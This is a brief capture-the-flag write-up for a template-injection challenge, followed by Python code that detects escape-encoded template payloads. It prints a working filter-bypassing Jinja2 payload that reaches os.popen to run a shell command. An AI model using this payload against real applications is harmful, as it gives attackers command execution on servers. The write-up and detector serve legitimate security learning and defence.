SSTI2

May 18, 2025

Here we are presented with the same website as in the first challenge, but this time the input is filtered. Searching the same payload repo turns up a payload that bypasses the filtering, and we can read the flag with this command:

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}
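Why a raw-character filter lets this payload through, shown as an added detection-side example that is not part of the original write-up: the underscores only exist after the template engine decodes the `\x5f` string escapes, so a check has to decode them before matching. The blocklist is an assumption (the page does not show the challenge's filter) and all function names are hypothetical.

```python
import re

# ASSUMPTION: the page does not show the challenge's filter; this raw-character
# blocklist stands in for it purely for illustration.
NAIVE_BLOCKLIST = ("_", ".", "[", "]")

# The payload from the write-up, as a raw string so the escapes stay literal.
PAGE_PAYLOAD = r"""{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}"""

# String-literal escapes (\xNN, \uNNNN, octal) that are resolved by the template
# engine only after an input filter has already looked at the raw text.
ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})|\\([0-7]{1,3})")
DUNDER = re.compile(r"__\w+__")
EXPRESSION = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)


def naive_filter_blocks(user_input):
    """The assumed filter: reject input containing a blocked raw character."""
    return any(ch in user_input for ch in NAIVE_BLOCKLIST)


def decode_escapes(text):
    """Resolve string-literal escapes the way the template lexer later will."""
    def repl(match):
        hex2, uni4, octal = match.groups()
        if octal is not None:
            return chr(int(octal, 8))
        return chr(int(hex2 or uni4, 16))
    return ESCAPE.sub(repl, text)


def suspicious_names(user_input):
    """Return dunder names reachable inside template expressions, post-decoding."""
    hits = []
    for expr in EXPRESSION.findall(user_input):
        hits.extend(DUNDER.findall(decode_escapes(expr)))
    return hits


if __name__ == "__main__":
    for sample in (PAGE_PAYLOAD, "Hello {{ name }}"):  # second input is constructed
        print(naive_filter_blocks(sample), suspicious_names(sample))
```

This is a detection aid for request logs or a WAF rule, not a sanitizer. The durable fix is to keep user input out of the template source and pass it to the template only as a variable.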
